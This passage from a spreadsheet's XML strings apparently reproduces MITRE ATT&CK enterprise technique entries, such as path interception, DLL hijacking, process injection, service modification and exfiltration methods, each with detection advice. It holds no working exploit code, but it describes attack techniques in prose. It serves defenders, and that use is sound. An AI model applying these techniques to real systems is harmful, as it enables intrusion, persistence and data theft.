    <t>An adversary may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.</t>
  </si>
  <si>
    <t>Data Encrypted</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,Binary file metadata</t>
  </si>
  <si>
    <t>Encryption software and encrypted files can be detected in many ways. Common utilities that may be present on the system or brought in by an adversary may be detectable through process monitoring and monitoring for command-line arguments for known encryption utilities. This may yield a significant amount of benign events, depending on how systems in the environment are typically used. Often the encryption key is stated within command-line invocation of the software. 
A process that loads the Windows DLL crypt32.dll may be used to perform encryption, decryption, or verification of file signatures. 
Network traffic may also be analyzed for entropy to determine if encrypted data is being transmitted. (Citation: Zhang 2013) If the communications channel is unencrypted, encrypted files of known file types can be detected in transit during exfiltration with a network intrusion detection or data loss prevention system analyzing file headers. (Citation: Wikipedia File Header Signatures)</t>
  </si>
  <si>
    <t>Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048)</t>
  </si>
  <si>
    <t>Shortcut Modification</t>
  </si>
  <si>
    <t>Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.</t>
  </si>
  <si>
    <t>Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</t>
  </si>
  <si>
    <t>Custom Cryptographic Protocol</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</t>
  </si>
  <si>
    <t>If malware uses custom encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: Fidelis DarkComet)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when communications do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.
Custom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used.
Some adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors. (Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>Data from Removable Media</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media.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[PowerShell](https://attack.mitre.org/techniques/T1086).</t>
  </si>
  <si>
    <t>Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration.
Adversaries may search connected removable media on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.</t>
  </si>
  <si>
    <t>Multiband Communication</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</si>
  <si>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 Correlating alerts between multiple communication channels can further help identify command-and-control behavior.</t>
  </si>
  <si>
    <t>Some adversaries may split communications between different protocols. There could be one protocol for inbound command and control and another for outbound data, allowing it to bypass certain firewall restrictions. The split could also be random to simply avoid data threshold alerts on any one communication.</t>
  </si>
  <si>
    <t>Obfuscated Files or Information</t>
  </si>
  <si>
    <t>Network protocol analysis,Process use of network,File monitoring,Malware reverse engineering,Binary file metadata,Process command-line parameters,Environment variable,Process monitoring,Windows event logs,Network intrusion detection system,Email gateway,SSL/TLS inspection</t>
  </si>
  <si>
    <t>Detection of file obfuscation is difficult unless artifacts are left behind by the obfuscation process that are uniquely detectable with a signature. If detection of the obfuscation itself is not possible, it may be possible to detect the malicious activity that caused the obfuscated file (for example, the method that was used to write, read, or modify the file on the file system).
Flag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)
Obfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.</t>
  </si>
  <si>
    <t>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used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obfuscate commands executed from payloads or directly via a [Command-Line Interface](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)
Another example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding [Invoke-PSImage](https://attack.mitre.org/software/S0231). The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used [Invoke-PSImage](https://attack.mitre.org/software/S0231) to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>File monitoring,Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the &lt;code&gt;winrm&lt;/code&gt; command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)</t>
  </si>
  <si>
    <t>execution,lateral-movement</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.</t>
  </si>
  <si>
    <t>Data exfiltration may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Command and Control Channel and Exfiltration Over Alternative Protocol.</t>
  </si>
  <si>
    <t>Data Transfer Size Limits</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer.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</si>
  <si>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An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>Modify Existing Service</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence. (Citation: TechNet Autoruns) 
Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;.
Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute [cmd](https://attack.mitre.org/software/S0106) commands or scripts.
Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).
Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.
Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)</t>
  </si>
  <si>
    <t>Standard Cryptographic Protocol</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Malware reverse engineering,Process use of network,Process monitoring,SSL/TLS inspection</t>
  </si>
  <si>
    <t>SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels. (Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation. (Citation: SEI SSL Inspection Risks)
If malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: Fidelis DarkComet)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</si>
  <si>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Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>Path Interception</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories.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Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)
There are multiple distinct weaknesses or misconfigurations that adversaries may take advantage of when performing path interception: unquoted paths, path environment variable misconfigurations, and search order hijacking. The first vulnerability deals with full program paths, while the second and third occur when program paths are not specified. These techniques can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.
### Unquoted Paths
Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;"C:\safe path with space\program.exe"&lt;/code&gt;). (Citation: Baggett 2012) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is &lt;code&gt;C:\program files\myapp.exe&lt;/code&gt;, an adversary may create a program at &lt;code&gt;C:\program.exe&lt;/code&gt; that will be run instead of the intended program. (Citation: SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)
### PATH Environment Variable Misconfiguration
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, &lt;code&gt;%SystemRoot%\system32&lt;/code&gt; (e.g., &lt;code&gt;C:\Windows\system32&lt;/code&gt;), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if &lt;code&gt;C:\example path&lt;/code&gt; precedes &lt;code&gt;C:\Windows\system32&lt;/code&gt; is in the PATH environment variable, a program that is named net.exe and placed in &lt;code&gt;C:\example path&lt;/code&gt; will be called instead of the Windows system "net" when "net" is executed from the command-line.
### Search Order Hijacking
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument &lt;code&gt;net user&lt;/code&gt;. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then &lt;code&gt;cmd.exe /C net user&lt;/code&gt; will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: MSDN Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>Changes to service Registry entries and command-line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).</t>
  </si>
  <si>
    <t>Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with [New Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.</t>
  </si>
  <si>
    <t>execution</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Binary file metadata</t>
  </si>
  <si>
    <t>Logon Scripts</t>
  </si>
  <si>
    <t>Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties.</t>
  </si>
  <si>
    <t>### Windows
Windows allows logon scripts to be run whenever a specific user or group of users log into a system. (Citation: TechNet Logon Scripts) The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server.
If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. This code can allow them to maintain persistence on a single system, if it is a local script, or to move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.
### Mac
Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.</t>
  </si>
  <si>
    <t>lateral-movement,persistence</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>File monitoring,DLL monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.</t>
  </si>
  <si>
    <t>Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. 
Adversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL. 
Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order)
If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.
Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.</t>
  </si>
  <si>
    <t>persistence,privilege-escalation,defense-evasion</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a network share.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[PowerShell](https://attack.mitre.org/techniques/T1086).</t>
  </si>
  <si>
    <t>Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration.
Adversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>Network device logs,Host network interface,Netflow/Enclave netflow,Process monitoring</t>
  </si>
  <si>
    <t>Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a man-in-the-middle attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.</t>
  </si>
  <si>
    <t>credential-access,discovery</t>
  </si>
  <si>
    <t>Exfiltration Over Command and Control Channel</t>
  </si>
  <si>
    <t>Detection for command and control applies.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</si>
  <si>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Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>Change Default File Association</t>
  </si>
  <si>
    <t>Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. 
User file association preferences are stored under &lt;code&gt; [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts&lt;/code&gt; and override associations configured under &lt;code&gt;[HKEY_CLASSES_ROOT]&lt;/code&gt;. Changes to a user's preference will occur under this entry's subkeys.
Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.</t>
  </si>
  <si>
    <t>When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
System file associations are listed under &lt;code&gt;HKEY_CLASSES_ROOT\.[extension]&lt;/code&gt;, for example &lt;code&gt;HKEY_CLASSES_ROOT\.txt&lt;/code&gt;. The entries point to a handler for that extension located at &lt;code&gt;HKEY_CLASSES_ROOT\[handler]&lt;/code&gt;. The various commands are then listed as subkeys underneath the shell key at &lt;code&gt;HKEY_CLASSES_ROOT\[handler]\shell\[action]\command&lt;/code&gt;. For example:
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\open\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\print\command&lt;/code&gt;
* &lt;code&gt;HKEY_CLASSES_ROOT\txtfile\shell\printto\command&lt;/code&gt;
The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands. (Citation: TrendMicro TROJ-FAKEAV OCT 2012)</t>
  </si>
  <si>
    <t>Commonly Used Port</t>
  </si>
  <si>
    <t>Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as
* TCP:80 (HTTP)
* TCP:443 (HTTPS)
* TCP:25 (SMTP)
* TCP/UDP:53 (DNS)
They may use the protocol associated with the port or a completely different protocol. 
For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are 
* TCP/UDP:135 (RPC)
* TCP/UDP:22 (SSH)
* TCP/UDP:3389 (RDP)</t>
  </si>
  <si>
    <t>File System Permissions Weakness</t>
  </si>
  <si>
    <t>File monitoring,Services,Process command-line parameters</t>
  </si>
  <si>
    <t>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Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques.</t>
  </si>
  <si>
    <t>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
### Services
Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.
### Executable Installers
Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the &lt;code&gt;%TEMP%&lt;/code&gt; directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</t>
  </si>
  <si>
    <t>Network Service Scanning</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</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</si>
  <si>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from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of "wmic" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)
An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>User interface,Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>New Service</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>Monitor service creation through changes in the Registry and common utilities using command-line invocation. Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017) (Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence. (Citation: TechNet Autoruns) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could create services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. 
Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).</t>
  </si>
  <si>
    <t>Shared Webroot</t>
  </si>
  <si>
    <t>Use file and process monitoring to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use process monitoring to identify normal processes that run on the Web server and detect processes that are not typically executed.</t>
  </si>
  <si>
    <t>Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website's webroot or Web content directory (Citation: Microsoft Web Root OCT 2016) (Citation: Apache Server 2018) and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured.
This mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited. (Citation: Webroot PHP 2011)</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</t>
  </si>
  <si>
    <t>Data loss prevention,File monitoring</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media are mounted.</t>
  </si>
  <si>
    <t>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</si>
  <si>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Scheduled Task</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>execution,persistence,privilege-escalation</t>
  </si>
  <si>
    <t>Indicator Blocking</t>
  </si>
  <si>
    <t>Sensor health and status,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t>API monitoring,Windows Registry,File monitoring,DLL monitoring,Process monitoring,Named Pipes</t>
  </si>
  <si>
    <t>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API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Endgame Process Injection July 2017)
Monitoring for Linux specific calls such as the ptrace system call, the use of LD_PRELOAD environment variable, or dlfcn dynamic linking API calls, should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods. (Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits)
Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules. (Citation: Microsoft Sysmon v6 May 2017)
Monitor processes and command-line arguments for actions that could be done before or after code injection has occurred and correlate the information with related event information. Code injection may also be performed using [PowerShell](https://attack.mitre.org/techniques/T1086) with tools such as PowerSploit, (Citation: Powersploit) so additional PowerShell monitoring may be required to cover known implementations of this behavior.</t>
  </si>
  <si>
    <t>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 Windows
There are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame Process Injection July 2017)
* **Dynamic-link library (DLL) injection** involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.
* **Portable executable injection** involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)
* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended.
* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state. A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018)  AtomBombing  (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)
* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)
### Mac and Linux
Implementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)
